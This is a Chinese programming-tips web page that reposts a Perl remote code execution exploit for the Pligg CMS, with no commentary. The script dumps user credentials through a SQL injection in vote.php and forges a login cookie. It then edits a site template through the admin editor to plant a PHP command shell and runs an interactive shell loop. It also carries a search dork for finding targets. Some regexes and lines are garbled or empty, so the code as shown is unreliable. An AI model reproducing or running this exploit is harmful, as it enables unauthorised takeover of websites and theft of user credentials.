欢迎来到福编程网,本站提供各种互联网专业知识!

Pligg

发布时间:1970-01-01 作者:佚名 来源:互联网
#!/usr/bin/perl-wuseLWP::UserAgent;useMIME::Base64;useDigest::MD5qw(md5_hex);useGetopt::Std;getopts('h:',%args);print"#############################################n";print"#Pligg<=9.9Remo
#!/usr/bin/perl -w

use LWP::UserAgent;

use MIME::Base64;

use Digest::MD5 qw(md5_hex);

use Getopt::Std; getopts('h:', %args);

print "#############################################n";

print "# Pligg <= 9.9 Remote Code Execution Exploit n";

print "#############################################n";

#dork = "Powered By Pligg" "Legal: License and Source"

# Proxy address

$ENV{http_proxy} = 'http://127.0.0.1:8118/';

my $http = LWP::UserAgent->new;

$http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');

#$http->env_proxy(); # <-- uncomment for proxy

$http->cookie_jar({});

my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory

my $user = undef;

my $pass = undef;

my $file = undef;

my $data = undef;

my @auth = undef;

# Details for the php code that is injected in to the template

my $ereg = '(.*?)';

my $cvar = 'cmd';

my $cval = 'pwd;id';

my $code = '';

print "[*] Checking if a shell already exists ...n";

$data = $http->post(

$host . '/index.php',

[

$cvar => $cval

]);

if ( $data->content =~ /$ereg/si )

{

print "[*] Found existing shell ...n";

}

else

{

print "[!] No existing shell found ...n";

#############################################

# Gather user info via vote.php SQL Injection

#############################################

$data = $http->post(

$host . '/vote.php',

[

'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',

'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works

]);

print "[*] Gathering user information ...n";

if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )

{

$user = $1;

$pass = $2;

# Sets up the cookie to authenticate us

@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');

print "[ ] Got user '$user' ...n";

}

else

{

print "[!] Unable to get user info. Dumping output ...n";

open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

exit;

}

#############################################

# Get the template path

#############################################

print "[*] Gathering template information ...n";

$data = $http->get($host . '/admin_editor.php',@auth);

if ( $data->content =~ />(.*?)/i )

{

$file = $1;

# Quick and dirty fix

$file =~ s/admin_templates/admin_access_denied.tpl/footer.tpl/;

print "[ ] Got template file [$file]...n";

}

#############################################

# Read the template contents

#############################################

$data = $http->post(

$host . '/admin_editor.php',

[

'the_file' => $file,

'open' => 'Open'

]

,@auth);

print "[*] Reading template data ...n";

# Grab the template contents

if ( $data->content =~ /(.*)/is )

{

$temp = $2;

$temp =~ s/>/>/ig;

$temp =~ s/</

$temp =~ s/"/"/ig;

$temp =~ s/&/&/ig;

print "[ ] Got template data ...n";

}

else

{

print "[!] Unable to get template data. Dumping output ...n";

open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

exit;

}

#############################################

# Update the Template Contents

#############################################

$data = $http->post(

$host . '/admin_editor.php',

[

'the_file2' => $file,

'updatedfile' => $temp . $code,

'save' => 'Save Changes'

]

,@auth);

print "[*] Updating template data ...n";

if ( $data->content =~ /File Saved/is )

{

print "[ ] File saved!n";

}

else

{

print "[!] Unable to update template data. Dumping output ...n";

open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

exit;

}

}

#############################################

# Setting up the php shell

#############################################

print "[*] Setting up shell ...n";

$data = $http->post(

$host . '/index.php',

[

$cvar => $cval

]);

if ( $data->content =~ /(.*?)/si )

{

while ( 1 )

{

print "pligg:~#";

$exec = ;

$data = $http->post(

$host . '/index.php',

[

$cvar => $exec

]);

if ( $data->content =~ /$ereg/si )

{

print $1 . "n";

}

else

{

print "Unexpected Response!n";

}

}

}

else

{

print "[!] Unable to set up shell ...n";

open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

exit;

}

sub usage

{

print "pligg_exploit.pl -h http://path/to/pligg n";

exit;

}

相关推荐

返回顶部